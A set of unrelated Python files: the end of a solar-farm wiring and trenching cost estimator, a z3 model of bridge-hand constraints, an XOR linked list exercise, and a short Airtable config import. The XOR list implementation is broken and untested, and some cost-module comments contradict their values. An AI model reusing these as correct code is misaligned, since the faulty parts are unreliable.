source_circuit_wire_length_lf = source_circuit_wire_length_m * self.m_to_lf
return source_circuit_wire_length_lf
def source_circuit_wire_length_total_lf(self, source_circuit_wire_length_lf,
num_quadrants):
"""
Returns combined source circuit wire length for all quadrants combined. This
includes length of wire in each sub row of each sub quadrant.
Accordingly, length of wire for both sub rows of every row, and both sub
quadrants of a quadrant has been accounted for up till this point.
"""
source_circuit_wire_length_total_lf = \
source_circuit_wire_length_lf * num_quadrants
self.output_dict['source_circuit_wire_length_total_lf'] = \
source_circuit_wire_length_total_lf
return source_circuit_wire_length_total_lf
def pv_wire_cost(self, system_size_MW_DC, circuit_type, circuit_amps):
"""
Empirical curve fit of pv wire cost ($/LF) for AWG #10 wire or smaller.
"""
if system_size_MW_DC > 500:
volume_order_discount_multiplier = 0.50 # 25 % discount (volume pricing)
elif system_size_MW_DC > 300:
volume_order_discount_multiplier = 0.70 # 25 % discount (volume pricing)
elif system_size_MW_DC > 150:
volume_order_discount_multiplier = 0.75 # 25 % discount (volume pricing)
elif system_size_MW_DC > 50:
volume_order_discount_multiplier = 0.80 # 20 % discount (volume pricing)
elif system_size_MW_DC > 20:
volume_order_discount_multiplier = 0.90
else:
volume_order_discount_multiplier = 1
pv_wire_DC_specs = self.input_dict['pv_wire_DC_specs']
if circuit_type is 'source_circuit':
cost_usd_lf = pv_wire_DC_specs.loc[
pv_wire_DC_specs['Size (AWG or kcmil)'] == 10, 'Cost (USD/LF)']
cost_usd_lf = cost_usd_lf.iloc[0]
elif circuit_type is 'output_circuit':
if circuit_amps >= 175:
cost_usd_lf = \
pv_wire_DC_specs.loc[
pv_wire_DC_specs['Temperature Rating of Conductor at 75°C ' \
'(167°F) in Amps'] == 175, 'Cost (USD/LF)']
else:
cost_usd_lf = \
pv_wire_DC_specs.loc[
pv_wire_DC_specs['Temperature Rating of Conductor at 75°C ' \
'(167°F) in Amps'] == 150, 'Cost (USD/LF)']
cost_usd_lf = cost_usd_lf.iloc[0]
pv_wire_cost = cost_usd_lf * volume_order_discount_multiplier # $/LF
return pv_wire_cost
# <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><
# Output circuit calculations:
def number_strings_quadrant(self, num_strings_per_row, num_rows_per_subquadrant):
"""
Get number of strings in each quadrant
"""
number_strings_quadrant = num_strings_per_row * num_rows_per_subquadrant * 2
return number_strings_quadrant
def num_strings_parallel(self, num_strings_per_row):
"""
Starting with the highest allowable number of strings in parallel as possible.
This is to ensure highest possible output circuit ampacity, which would lead
to lowest possible max allowable circuit resistance.
"""
if num_strings_per_row > 24:
num_strings_parallel = 24
else:
num_strings_parallel = num_strings_per_row
return int(num_strings_parallel)
def output_circuit_ampacity(self, num_strings_in_parallel):
"""
"""
string_short_circuit_current = self.input_dict['module_I_SC_DC']
# Consider 25% safety factor for over irradiance / over-current scenarios
over_current_factor = 1.25
output_circuit_ampacity = over_current_factor * \
string_short_circuit_current * \
num_strings_in_parallel
return output_circuit_ampacity
def row_spacing_m(self, quadrant_length_m, number_rows_per_subquadrant):
"""
"""
row_spacing_m = quadrant_length_m / number_rows_per_subquadrant
return row_spacing_m
def voltage_drop_V(self):
"""
Returns maximum allowable Voltage drop (in V) in an output circuit based on
NEC guidelines.
"""
voltage_drop_V = self.allowable_vd_percent * self.output_dict['string_V_oc']
return voltage_drop_V
def VD_passes(self,
circuit_length_m,
wire_R_per_kft,
max_VD,
output_circuit_ampacity):
"""
Once the wire has been picked based on its ampacity, call this method to
check whether the VD from using this wire exceeds 3%
"""
R = wire_R_per_kft * (1 / 1000) * (circuit_length_m * self.m_to_lf)
VD = R * output_circuit_ampacity
if VD > max_VD:
return False
else:
return True
def circular_mils_area(self, circuit_length, current, VD):
"""
Calculates the wire's circ mils area. This will help in selecting wire
appropriate for wiring (based on its ampacity and ohms/kFT)
"""
circular_mills_area = (circuit_length * self.Cu_specific_resistivity *
current) / VD
return circular_mills_area
def estimate_construction_time(self):
"""
Function to estimate construction time on per turbine basis.
Parameters
-------
duration_construction
pd.DataFrame
construction_estimator
pd.DataFrame
trench_length_km
Returns
-------
(pd.DataFrame) operation_data
"""
# assumes collection construction occurs for 45 % of project duration
collection_construction_time = self.input_dict[
'construction_time_months'] * 0.45
throughput_operations = self.input_dict['construction_estimator']
trench_length_km = self.output_dict['trench_length_km']
operation_data = throughput_operations.where(
throughput_operations['Module'] == 'Collection').dropna(thresh=4)
source_wiring_operations = throughput_operations.where(
throughput_operations['Module'] == 'Source circuit wiring').dropna(thresh=4)
output_wiring_operations = throughput_operations.where(
throughput_operations['Module'] == 'Output circuit wiring').dropna(thresh=4)
# from construction_estimator data, only read in Collection related data and
# filter out the rest:
cable_trenching = throughput_operations[throughput_operations.Module == 'Collection']
source_wiring = throughput_operations[throughput_operations.Module == 'Source circuit wiring']
output_wiring = throughput_operations[throughput_operations.Module == 'Output circuit wiring']
# Storing data with labor related inputs:
trenching_labor = cable_trenching[cable_trenching.values == 'Labor']
trenching_labor_usd_per_hr = trenching_labor['Rate USD per unit'].sum()
self.output_dict['trenching_labor_usd_per_hr'] = trenching_labor_usd_per_hr
# Units: LF/day -> where LF = Linear Foot
trenching_labor_daily_output = trenching_labor['Daily output'].values[0]
trenching_labor_num_workers = trenching_labor['Number of workers'].sum()
# Get labor daily output for source circuit wiring:
source_wiring_labor = source_wiring[source_wiring.Module == 'Source circuit wiring']
source_circuit_daily_output = source_wiring_labor.loc[
source_wiring_labor['Operation ID'] == 'Source circuit wiring', 'Daily output']
source_circuit_daily_output = source_circuit_daily_output.iloc[0]
self.output_dict['source_circuit_daily_output'] = source_circuit_daily_output
# Get labor daily output for output circuit wiring:
output_wiring_labor = output_wiring[output_wiring.Module == 'Output circuit wiring']
output_circuit_daily_output = output_wiring_labor.loc[
output_wiring_labor['Operation ID'] == 'Output circuit wiring', 'Daily output']
output_circuit_daily_output = output_circuit_daily_output.iloc[0]
self.output_dict['output_circuit_daily_output'] = output_circuit_daily_output
# Storing data with equipment related inputs:
trenching_equipment = cable_trenching[cable_trenching.values == 'Equipment']
trenching_cable_equipment_usd_per_hr = trenching_equipment['Rate USD per unit'].sum()
self.output_dict['trenching_cable_equipment_usd_per_hr'] = \
trenching_cable_equipment_usd_per_hr
# Units: LF/day -> where LF = Linear Foot
trenching_equipment_daily_output = trenching_equipment['Daily output'].values[0]
self.output_dict['trenching_labor_daily_output'] = trenching_labor_daily_output
self.output_dict['trenching_equipment_daily_output'] = trenching_equipment_daily_output
operation_data['Number of days taken by single crew'] = \
((trench_length_km * self._km_to_LF) / trenching_labor_daily_output)
operation_data['Number of crews'] = \
np.ceil((operation_data['Number of days taken by single crew'] / 30) /
collection_construction_time)
operation_data['Cost USD without weather delays'] = \
((trench_length_km * self._km_to_LF) / trenching_labor_daily_output) * \
(operation_data['Rate USD per unit'] * self.input_dict['hour_day'])
# Repeat above steps, for cost of source circuit wiring
source_wiring_operations['Number of days taken by single crew'] = \
self.output_dict['source_circuit_wire_length_total_lf'] / source_circuit_daily_output
source_wiring_operations['Number of crews'] = \
np.ceil((source_wiring_operations['Number of days taken by single crew'] / 30) /
collection_construction_time)
source_wiring_operations['Cost USD without weather delays'] = \
self.output_dict['source_circuit_wire_length_total_lf'] * \
source_wiring_operations['Rate USD per unit']
self.output_dict['source_wiring_USD_lf'] = \
source_wiring_operations['Rate USD per unit'].iloc[0]
# Repeat above steps, for cost of output circuit wiring
output_wiring_operations['Number of days taken by single crew'] = \
self.output_dict['output_circuit_wire_length_total_lf'] / output_circuit_daily_output
output_wiring_operations['Number of crews'] = \
np.ceil((output_wiring_operations['Number of days taken by single crew'] / 30) /
collection_construction_time)
output_wiring_operations['Cost USD without weather delays'] = \
self.output_dict['output_circuit_wire_length_total_lf'] * \
output_wiring_operations['Rate USD per unit']
self.output_dict['output_wiring_USD_lf'] = \
output_wiring_operations['Rate USD per unit'].iloc[0]
alpha = operation_data[operation_data['Type of cost'] == 'Labor']
operation_data_id_days_crews_workers = alpha[['Operation ID',
'Number of days taken by single crew',
'Number of crews',
'Number of workers']]
source_wiring_alpha = source_wiring_operations[source_wiring_operations['Type of cost'] == 'Labor']
source_wiring_id_days_crews_workers = source_wiring_alpha[['Operation ID',
'Number of days taken by single crew',
'Number of crews',
'Number of workers']]
output_wiring_alpha = output_wiring_operations[output_wiring_operations['Type of cost'] == 'Labor']
output_wiring_id_days_crews_workers = output_wiring_alpha[['Operation ID',
'Number of days taken by single crew',
'Number of crews',
'Number of workers']]
operation_data_id_days_crews_workers = pd.merge(operation_data_id_days_crews_workers,
source_wiring_id_days_crews_workers,
how='outer')
operation_data_id_days_crews_workers = pd.merge(operation_data_id_days_crews_workers,
output_wiring_id_days_crews_workers,
how='outer')
operation_data = pd.merge(operation_data, source_wiring_operations, how='outer')
operation_data = pd.merge(operation_data, output_wiring_operations, how='outer')
# if more than one crew needed to complete within construction duration then
# assume that all construction happens within that window and use that timeframe
# for weather delays;
# if not, use the number of days calculated
operation_data['time_construct_bool'] = \
operation_data['Number of days taken by single crew'] > \
(collection_construction_time * 30)
boolean_dictionary = {True: collection_construction_time * 30, False: np.NAN}
operation_data['time_construct_bool'] = \
operation_data['time_construct_bool'].map(boolean_dictionary)
operation_data['Time construct days'] = \
operation_data[['time_construct_bool',
'Number of days taken by single crew']].min(axis=1)
self.output_dict['num_days'] = operation_data['Time construct days'].max()
self.output_dict['managament_crew_cost_before_wind_delay'] = 0
self.output_dict['operation_data_id_days_crews_workers'] = \
operation_data_id_days_crews_workers
self.output_dict['operation_data_entire_farm'] = operation_data
return self.output_dict['operation_data_entire_farm']
def calculate_costs(self):
# Read in construction_estimator data:
# construction_estimator = input_dict['construction_estimator']
operation_data = self.output_dict['operation_data_entire_farm']
per_diem = operation_data['Number of workers'] * \
operation_data['Number of crews'] * \
(operation_data['Time construct days'] +
np.ceil(operation_data['Time construct days'] / 7)) * \
self.input_dict['construction_estimator_per_diem']
per_diem = per_diem.dropna()
self.output_dict['time_construct_days'] = \
(self.output_dict['trench_length_km'] * self._km_to_LF) / \
self.output_dict['trenching_labor_daily_output']
# weather based delays not yet implemented in SolarBOSSE
self.output_dict['wind_multiplier'] = 1 # Placeholder
# Calculating trenching cost:
self.output_dict['Days taken for trenching (equipment)'] = \
(self.output_dict['trench_length_km'] * self._km_to_LF) / \
self.output_dict['trenching_equipment_daily_output']
self.output_dict['Equipment cost of trenching per day {usd/day)'] = \
self.output_dict['trenching_cable_equipment_usd_per_hr'] * \
self.input_dict['hour_day']
self.output_dict['Equipment Cost USD without weather delays'] = \
self.output_dict['Days taken for trenching (equipment)'] * \
self.output_dict['Equipment cost of trenching per day {usd/day)']
self.output_dict['Equipment Cost USD with weather delays'] = \
self.output_dict['Equipment Cost USD without weather delays'] * \
self.output_dict['wind_multiplier']
trenching_equipment_rental_cost_df = \
pd.DataFrame([['Equipment rental',
self.output_dict['Equipment Cost USD with weather delays'],
'Collection']],
columns=['Type of cost',
'Cost USD',
'Phase of construction'])
# Calculating trenching labor cost:
self.output_dict['Days taken for trenching (labor)'] = \
((self.output_dict['trench_length_km'] * self._km_to_LF) /
self.output_dict['trenching_labor_daily_output'])
self.output_dict['days_taken_source_wiring'] = \
self.output_dict['source_circuit_wire_length_total_lf'] / \
self.output_dict['source_circuit_daily_output']
self.output_dict['days_taken_output_wiring'] = \
self.output_dict['output_circuit_wire_length_total_lf'] / \
self.output_dict['output_circuit_daily_output']
self.output_dict['Labor cost of trenching per day (usd/day)'] = \
(self.output_dict['trenching_labor_usd_per_hr'] *
self.input_dict['hour_day'] *
self.input_dict['overtime_multiplier'])
self.output_dict['Labor cost of source wiring per day (usd/day)'] = \
(self.output_dict['source_circuit_daily_output'] *
self.output_dict['source_wiring_USD_lf'] *
self.input_dict['overtime_multiplier'])
self.output_dict['Labor cost of output wiring per day (usd/day)'] = \
(self.output_dict['output_circuit_daily_output'] *
self.output_dict['output_wiring_USD_lf'] *
self.input_dict['overtime_multiplier'])
self.output_dict['Total per diem costs (USD)'] = per_diem.sum()
foo = self.output_dict['Labor cost of source wiring per day (usd/day)'] * \
self.output_dict['days_taken_source_wiring']
self.output_dict['Labor Cost USD without weather delays'] = \
((self.output_dict['Days taken for trenching (labor)'] *
self.output_dict['Labor cost of trenching per day (usd/day)']
) +
(self.output_dict['Labor cost of source wiring per day (usd/day)'] *
self.output_dict['days_taken_source_wiring']
) +
(self.output_dict['Labor cost of output wiring per day (usd/day)'] *
self.output_dict['days_taken_output_wiring']
) +
(self.output_dict['Total per diem costs (USD)'] +
self.output_dict['managament_crew_cost_before_wind_delay']
))
self.output_dict['Labor Cost USD with weather delays'] = \
self.output_dict['Labor Cost USD without weather delays'] * \
self.output_dict['wind_multiplier']
trenching_labor_cost_df = pd.DataFrame([['Labor',
self.output_dict['Labor Cost USD with weather delays'],
'Collection']],
columns=['Type of cost',
'Cost USD',
'Phase of construction'])
# Calculate cable cost:
cable_cost_usd_per_LF_df = pd.DataFrame([['Materials',
self.output_dict['total_material_cost'],
'Collection']],
columns=['Type of cost',
'Cost USD',
'Phase of construction'])
# Combine all calculated cost items into the 'collection_cost' data frame:
collection_cost = pd.DataFrame([], columns=['Type of cost',
'Cost USD',
'Phase of construction'])
collection_cost = collection_cost.append(trenching_equipment_rental_cost_df)
collection_cost = collection_cost.append(trenching_labor_cost_df)
collection_cost = collection_cost.append(cable_cost_usd_per_LF_df)
# Calculate Mobilization Cost and add to collection_cost data frame:
equip_material_mobilization_multiplier = \
0.16161 * (self.input_dict['system_size_MW_DC'] ** (-0.135))
material_mobilization_USD = self.output_dict['total_material_cost'] * \
equip_material_mobilization_multiplier
equipment_mobilization_USD = \
self.output_dict['Equipment Cost USD with weather delays'] * \
equip_material_mobilization_multiplier
labor_mobilization_multiplier = \
1.245 * (self.input_dict['system_size_MW_DC'] ** (-0.367))
labor_mobilization_USD = \
self.output_dict['Labor Cost USD with weather delays'] * \
labor_mobilization_multiplier
collection_mobilization_usd = material_mobilization_USD + \
equipment_mobilization_USD + \
labor_mobilization_USD
mobilization_cost = pd.DataFrame([['Mobilization',
collection_mobilization_usd ,
'Collection']],
columns=['Type of cost',
'Cost USD',
'Phase of construction'])
collection_cost = collection_cost.append(mobilization_cost)
self.output_dict['total_collection_cost_df'] = collection_cost
self.output_dict['total_collection_cost'] = collection_cost['Cost USD'].sum()
return self.output_dict['total_collection_cost']
def run_module_for_150_MW(self):
"""
Runs the CollectionCost module and populates the IO dictionaries with
calculated values.
Parameters
----------
<None>
Returns
-------
tuple
First element of tuple contains a 0 or 1. 0 means no errors happened
and 1 means an error happened and the module failed to run. The second
element either returns a 0 if the module ran successfully, or it returns
the error raised that caused the failure.
"""
# l = length ; w = width
project_l_m, project_w_m = self.land_dimensions()
l, w = self.get_quadrant_dimensions()
num_quadrants = len(self.inverter_list())
number_rows_per_subquadrant = self.number_rows_per_subquadrant()
num_strings_per_row = self.num_strings_per_row()
source_circuit_wire_length_lf =\
self.source_circuit_wire_length_lf(num_strings_per_row,
number_rows_per_subquadrant)
source_circuit_wire_length_total_lf = \
self.source_circuit_wire_length_total_lf(source_circuit_wire_length_lf,
num_quadrants)
self.output_dict['source_circuit_wire_length_total_lf'] = \
source_circuit_wire_length_total_lf
# Begin output circuit calculations:
num_strings_per_quadrant = \
self.number_strings_quadrant(num_strings_per_row,
number_rows_per_subquadrant)
num_strings_parallel = self.num_strings_parallel(num_strings_per_row)
row_spacing_m = self.row_spacing_m(l, number_rows_per_subquadrant)
# make a list of rows in each quadrant:
all_rows = [n for n in range(number_rows_per_subquadrant)]
row_out_circuit_length_m = all_rows
# starting with the bottom-most row in a quadrant (which is also the
# farthest row from the inverter.
total_out_circuit_length_m = 0 # Initialize
for row in all_rows:
row_inverter_distance_m = ((number_rows_per_subquadrant - 1) - row) * \
row_spacing_m
row_out_circuit_length_m[row] = row_inverter_distance_m * 2
total_out_circuit_length_m += row_out_circuit_length_m[row]
# total output circuit length for quadrant (2 sub quadrants per quadrant):
TOC_length_quadrant_m = total_out_circuit_length_m * 2
# Total output circuit length for entire farms (all quadrants combined):
output_circuit_wire_length_total_lf = \
TOC_length_quadrant_m * self.m_to_lf * num_quadrants
self.output_dict[
'output_circuit_wire_length_total_lf'] = output_circuit_wire_length_total_lf
# Trench length for project (all quadrants combined):
self.output_dict['trench_length_km'] = (project_l_m / 1000) * 2 # 2 trenches
# Series of methods to select the right cable for output circuit:
# Not using this set of implementations for now. That is, I'm assuming the
# cable selected based solely on circuit ampacity also satisfies the 3 %
# VD (max) requirement.
# longest_output_circuit_m = row_out_circuit_length_m[0]
# max_voltage_drop_V = self.voltage_drop_V()
# self.VD_passes(longest_output_circuit_m, max_voltage_drop_V,
# output_circuit_ampacity)
output_circuit_ampacity = self.output_circuit_ampacity(num_strings_parallel)
total_material_cost = source_circuit_wire_length_total_lf * \
self.pv_wire_cost(self.input_dict['system_size_MW_DC'],
'source_circuit',
self.input_dict['module_I_SC_DC'])
total_material_cost += TOC_length_quadrant_m * self.m_to_lf * num_quadrants * \
self.pv_wire_cost(self.input_dict['system_size_MW_DC'],
'output_circuit',
output_circuit_ampacity)
self.output_dict['total_material_cost'] = total_material_cost
self.estimate_construction_time()
self.output_dict['total_collection_cost'] = self.calculate_costs()
def run_module(self):
"""
"""
try:
original_site_prep_area_acres = self.input_dict['site_prep_area_acres']
regions_list = []
region_iter = 0
total_collection_cost = 0
if self.input_dict['system_size_MW_DC'] > 150:
site_prep_area_regions = self.input_dict['system_size_MW_DC'] / 150
fraction_site_prep_area_regions = site_prep_area_regions - \
math.floor(site_prep_area_regions)
region_iter = math.floor(site_prep_area_regions)
for i in range(region_iter):
regions_list.append(150) # Stores size (in MW) of the region
if fraction_site_prep_area_regions > 0:
regions_list.append(fraction_site_prep_area_regions * 150)
for region in regions_list:
# Should be site_prep_area_acres_mw_dc and not site_prep_area_acres_mw_ac
self.input_dict['site_prep_area_acres'] = \
self.input_dict['site_prep_area_acres_mw_ac'] * region
self.run_module_for_150_MW()
total_collection_cost += self.output_dict['total_collection_cost']
else:
self.run_module_for_150_MW()
total_collection_cost += self.output_dict['total_collection_cost']
self.input_dict['site_prep_area_acres'] = original_site_prep_area_acres
self.output_dict['total_collection_cost'] = total_collection_cost
# self.output_dict['total_collection_cost'] = 65153571
return 0, 0 # module ran successfully
except Exception as error:
traceback.print_exc()
print(f"Fail {self.project_name} CollectionCost")
self.input_dict['error']['CollectionCost'] = error
return 1, error # module did not run successfully
| python |
# Copyright (c) 2013 The SAYCBridge Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from z3b import enum
import core.suit as suit
import z3
_honor_names = ('ace', 'king', 'queen', 'jack', 'ten')
_honor_values = (4, 3, 2, 1, 0)
def _honor_vars(suit):
return map(z3.Int, map(("{}_of_" + suit.name.lower()).format, _honor_names))
def _suit_count_var(suit):
return z3.Int(suit.name.lower())
clubs, diamonds, hearts, spades = map(_suit_count_var, suit.SUITS)
def expr_for_suit(suit):
return (clubs, diamonds, hearts, spades)[suit.index]
ace_of_spades, king_of_spades, queen_of_spades, jack_of_spades, ten_of_spades = _honor_vars(suit.SPADES)
ace_of_hearts, king_of_hearts, queen_of_hearts, jack_of_hearts, ten_of_hearts = _honor_vars(suit.HEARTS)
ace_of_diamonds, king_of_diamonds, queen_of_diamonds, jack_of_diamonds, ten_of_diamonds = _honor_vars(suit.DIAMONDS)
ace_of_clubs, king_of_clubs, queen_of_clubs, jack_of_clubs, ten_of_clubs = _honor_vars(suit.CLUBS)
high_card_points, points, playing_points = z3.Ints('high_card_points points playing_points')
points_supporting_spades, points_supporting_hearts, points_supporting_diamonds, points_supporting_clubs = z3.Ints(
'points_supporting_spades points_supporting_hearts points_supporting_diamonds points_supporting_clubs')
void_in_spades, void_in_hearts, void_in_diamonds, void_in_clubs = z3.Ints(
'void_in_spades void_in_hearts void_in_diamonds void_in_clubs')
singleton_in_spades, singleton_in_hearts, singleton_in_diamonds, singleton_in_clubs = z3.Ints(
'singleton_in_spades singleton_in_hearts singleton_in_diamonds singleton_in_clubs')
doubleton_in_spades, doubleton_in_hearts, doubleton_in_diamonds, doubleton_in_clubs = z3.Ints(
'doubleton_in_spades doubleton_in_hearts doubleton_in_diamonds doubleton_in_clubs')
voids, singletons, doubletons = z3.Ints('voids singletons doubletons')
def named_count_expr(count_name, count):
exprs = []
suit_count_vars = map(expr_for_suit, suit.SUITS)
suit_matches_count_vars = [z3.Int("%s_in_%s" % (count_name, s.name.lower())) for s in suit.SUITS] # void_in_spades, etc.
exprs = [
# FIXME: Can z3 support writing this as "void_in_spades == (spades == 0)"?
z3.Or(
z3.And(suit_count == count, suit_matches_count == 1),
z3.And(suit_count != count, suit_matches_count == 0),
)
for suit_count, suit_matches_count in zip(suit_count_vars, suit_matches_count_vars)
]
exprs.append(z3.Int(count_name + "s") == sum(suit_matches_count_vars))
return z3.And(*exprs)
def constrain_honors_expr():
exprs = []
for honor_suit in suit.SUITS:
# The easiest way to have an Int var and constrain it to bool values is to just:
# z3.And(0 <= ace_of_spades, ace_of_spades <= 1)
honor_vars = _honor_vars(honor_suit)
exprs.extend([z3.And(0 <= honor_var, honor_var <= 1) for honor_var in honor_vars])
# Also make sure that total number of honors is <= total number of cards
exprs.append(sum(honor_vars) <= expr_for_suit(honor_suit))
return z3.And(*exprs)
axioms = [
spades + hearts + diamonds + clubs == 13,
spades >= 0,
hearts >= 0,
diamonds >= 0,
clubs >= 0,
0 <= high_card_points, high_card_points <= 37,
points == high_card_points,
high_card_points <= playing_points,
playing_points <= 55, # Just to make the model finite.
named_count_expr('void', 0),
named_count_expr('singleton', 1),
named_count_expr('doubleton', 2),
constrain_honors_expr(),
z3.Or(
z3.And(spades <= 2, points_supporting_spades == high_card_points),
z3.And(spades == 3, points_supporting_spades == high_card_points + doubletons + 2 * singletons + 3 * voids),
z3.And(spades >= 4, points_supporting_spades == high_card_points + doubletons + 3 * singletons + 5 * voids),
),
z3.Or(
z3.And(hearts <= 2, points_supporting_hearts == high_card_points),
z3.And(hearts == 3, points_supporting_hearts == high_card_points + doubletons + 2 * singletons + 3 * voids),
z3.And(hearts >= 4, points_supporting_hearts == high_card_points + doubletons + 3 * singletons + 5 * voids),
),
z3.Or(
z3.And(diamonds <= 2, points_supporting_diamonds == high_card_points),
z3.And(diamonds == 3, points_supporting_diamonds == high_card_points + doubletons + 2 * singletons + 3 * voids),
z3.And(diamonds >= 4, points_supporting_diamonds == high_card_points + doubletons + 3 * singletons + 5 * voids),
),
z3.Or(
z3.And(clubs <= 2, points_supporting_clubs == high_card_points),
z3.And(clubs == 3, points_supporting_clubs == high_card_points + doubletons + 2 * singletons + 3 * voids),
z3.And(clubs >= 4, points_supporting_clubs == high_card_points + doubletons + 3 * singletons + 5 * voids),
),
sum([ # Sum the sums for all suits.
sum([ # Sum the honors for a single suit
a * b for a, b in zip(_honor_values, honor_vars)])
for honor_vars in map(_honor_vars, suit.SUITS)
]) == high_card_points, # The total is our hcp.
]
min_hcp_for_open = 8
def _expr_for_point_rule(count):
return z3.And(
high_card_points >= min_hcp_for_open,
playing_points >= 12,
z3.Or(
spades + hearts + high_card_points >= count,
spades + diamonds + high_card_points >= count,
spades + clubs + high_card_points >= count,
hearts + diamonds + high_card_points >= count,
hearts + clubs + high_card_points >= count,
diamonds + clubs + high_card_points >= count,
)
)
rule_of_twenty = _expr_for_point_rule(20)
rule_of_nineteen = _expr_for_point_rule(19)
# FIXME: This rule probably needs to consider min_hcp_for_open
rule_of_fifteen = z3.And(spades + high_card_points >= 15, high_card_points >= min_hcp_for_open, playing_points >= 12)
two_of_the_top_three_spades = ace_of_spades + king_of_spades + queen_of_spades >= 2
two_of_the_top_three_hearts = ace_of_hearts + king_of_hearts + queen_of_hearts >= 2
two_of_the_top_three_diamonds = ace_of_diamonds + king_of_diamonds + queen_of_diamonds >= 2
two_of_the_top_three_clubs = ace_of_clubs + king_of_clubs + queen_of_clubs >= 2
three_of_the_top_five_spades = ace_of_spades + king_of_spades + queen_of_spades + jack_of_spades + ten_of_spades >= 3
three_of_the_top_five_hearts = ace_of_hearts + king_of_hearts + queen_of_hearts + jack_of_hearts + ten_of_hearts >= 3
three_of_the_top_five_diamonds = ace_of_diamonds + king_of_diamonds + queen_of_diamonds + jack_of_diamonds + ten_of_diamonds >= 3
three_of_the_top_five_clubs = ace_of_clubs + king_of_clubs + queen_of_clubs + jack_of_clubs + ten_of_clubs >= 3
three_of_the_top_five_spades_or_better = z3.Or(two_of_the_top_three_spades, three_of_the_top_five_spades)
three_of_the_top_five_hearts_or_better = z3.Or(two_of_the_top_three_hearts, three_of_the_top_five_hearts)
three_of_the_top_five_diamonds_or_better = z3.Or(two_of_the_top_three_diamonds, three_of_the_top_five_diamonds)
three_of_the_top_five_clubs_or_better = z3.Or(two_of_the_top_three_clubs, three_of_the_top_five_clubs)
third_round_stopper_spades = z3.Or(ace_of_spades == 1, z3.And(king_of_spades == 1, spades >= 2), z3.And(queen_of_spades == 1, spades >= 3))
third_round_stopper_hearts = z3.Or(ace_of_hearts == 1, z3.And(king_of_hearts == 1, hearts >= 2), z3.And(queen_of_hearts == 1, hearts >= 3))
third_round_stopper_diamonds = z3.Or(ace_of_diamonds == 1, z3.And(king_of_diamonds == 1, diamonds >= 2), z3.And(queen_of_diamonds == 1, diamonds >= 3))
third_round_stopper_clubs = z3.Or(ace_of_clubs == 1, z3.And(king_of_clubs == 1, clubs >= 2), z3.And(queen_of_clubs == 1, clubs >= 3))
number_of_aces = ace_of_spades + ace_of_hearts + ace_of_diamonds + ace_of_clubs
number_of_kings = king_of_spades + king_of_hearts + king_of_diamonds + king_of_clubs
balanced = z3.And(doubletons <= 1, singletons == 0, voids == 0)
stopper_spades = z3.Or(ace_of_spades == 1, z3.And(king_of_spades == 1, spades >= 2), z3.And(queen_of_spades == 1, spades >= 3), z3.And(jack_of_spades == 1, ten_of_spades == 1, spades >= 4))
stopper_hearts = z3.Or(ace_of_hearts == 1, z3.And(king_of_hearts == 1, hearts >= 2), z3.And(queen_of_hearts == 1, hearts >= 3), z3.And(jack_of_hearts == 1, ten_of_hearts == 1, hearts >= 4))
stopper_diamonds = z3.Or(ace_of_diamonds == 1, z3.And(king_of_diamonds == 1, diamonds >= 2), z3.And(queen_of_diamonds == 1, diamonds >= 3), z3.And(jack_of_diamonds == 1, ten_of_diamonds == 1, diamonds >= 4))
stopper_clubs = z3.Or(ace_of_clubs == 1, z3.And(king_of_clubs == 1, clubs >= 2), z3.And(queen_of_clubs == 1, clubs >= 3), z3.And(jack_of_clubs == 1, ten_of_clubs == 1, clubs >= 4))
NO_CONSTRAINTS = z3.BoolVal(True)
def stopper_expr_for_suit(suit):
return (
stopper_clubs,
stopper_diamonds,
stopper_hearts,
stopper_spades,
)[suit.index]
def support_points_expr_for_suit(suit):
return (
points_supporting_clubs,
points_supporting_diamonds,
points_supporting_hearts,
points_supporting_spades,
)[suit.index]
def expr_for_hand(hand):
cards_in_spades = hand.cards_in_suit(suit.SPADES)
cards_in_hearts = hand.cards_in_suit(suit.HEARTS)
cards_in_diamonds = hand.cards_in_suit(suit.DIAMONDS)
cards_in_clubs = hand.cards_in_suit(suit.CLUBS)
return z3.And(
spades == len(cards_in_spades),
hearts == len(cards_in_hearts),
diamonds == len(cards_in_diamonds),
clubs == len(cards_in_clubs),
ace_of_spades == int('A' in cards_in_spades),
king_of_spades == int('K' in cards_in_spades),
queen_of_spades == int('Q' in cards_in_spades),
jack_of_spades == int('J' in cards_in_spades),
ten_of_spades == int('T' in cards_in_spades),
ace_of_hearts == int('A' in cards_in_hearts),
king_of_hearts == int('K' in cards_in_hearts),
queen_of_hearts == int('Q' in cards_in_hearts),
jack_of_hearts == int('J' in cards_in_hearts),
ten_of_hearts == int('T' in cards_in_hearts),
ace_of_diamonds == int('A' in cards_in_diamonds),
king_of_diamonds == int('K' in cards_in_diamonds),
queen_of_diamonds == int('Q' in cards_in_diamonds),
jack_of_diamonds == int('J' in cards_in_diamonds),
ten_of_diamonds == int('T' in cards_in_diamonds),
ace_of_clubs == int('A' in cards_in_clubs),
king_of_clubs == int('K' in cards_in_clubs),
queen_of_clubs == int('Q' in cards_in_clubs),
jack_of_clubs == int('J' in cards_in_clubs),
ten_of_clubs == int('T' in cards_in_clubs),
)
positions = enum.Enum(
"RHO",
"Partner",
"LHO",
"Me",
)
def is_certain(solver, expr):
solver.push()
solver.add(z3.Not(expr))
result = solver.check() == z3.unsat
solver.pop()
return result
def is_possible(solver, expr):
solver.push()
solver.add(expr)
result = solver.check() == z3.sat
solver.pop()
return result
| python |
# An XOR linked list is a more memory efficient doubly linked list.
# Instead of each node holding next and prev fields, it holds a field named both,
# which is an XOR of the next node and the previous node.
# Implement an XOR linked list; it has an add(element) which adds the
# element to the end, and a get(index) which returns the node at index.
# If using a language that has no pointers (such as Python),
# you can assume you have access to get_pointer and
# dereference_pointer functions that converts between nodes and memory addresses
# Note: not sure how to test the code since Python doesn't use
# pointers the same way as other languages.
class Node():
def __init__(self, value = None, xor = None):
self.value = value
self.xor = xor
def get_pointer(node):
pass
def dereference_pointer(node):
pass
class XORlist():
def __init__(self):
self.head = Node()
self.tail = Node()
def add(self, element):
new = Node()
if self.head.value == None:
self.head = self.tail = new.val
else:
new.xor = self.tail.xor ^ get_pointer(new)
self.tail = new
def get(self, index):
temp_head = self.head
temp_prev = 0
if index >= 0:
for i in range(index):
temp_pnt = get_pointer(temp_head)
temp_head = dereference_pointer(temp_head.both ^ temp_prev)
temp_head = temp_pnt
if temp_head == self.tail:
return None
return temp_head | python |
from app import const
BASE_ID = const.AIRTABLE_MAP_BY_GEOGRAPHIC_AREA_BASE_ID
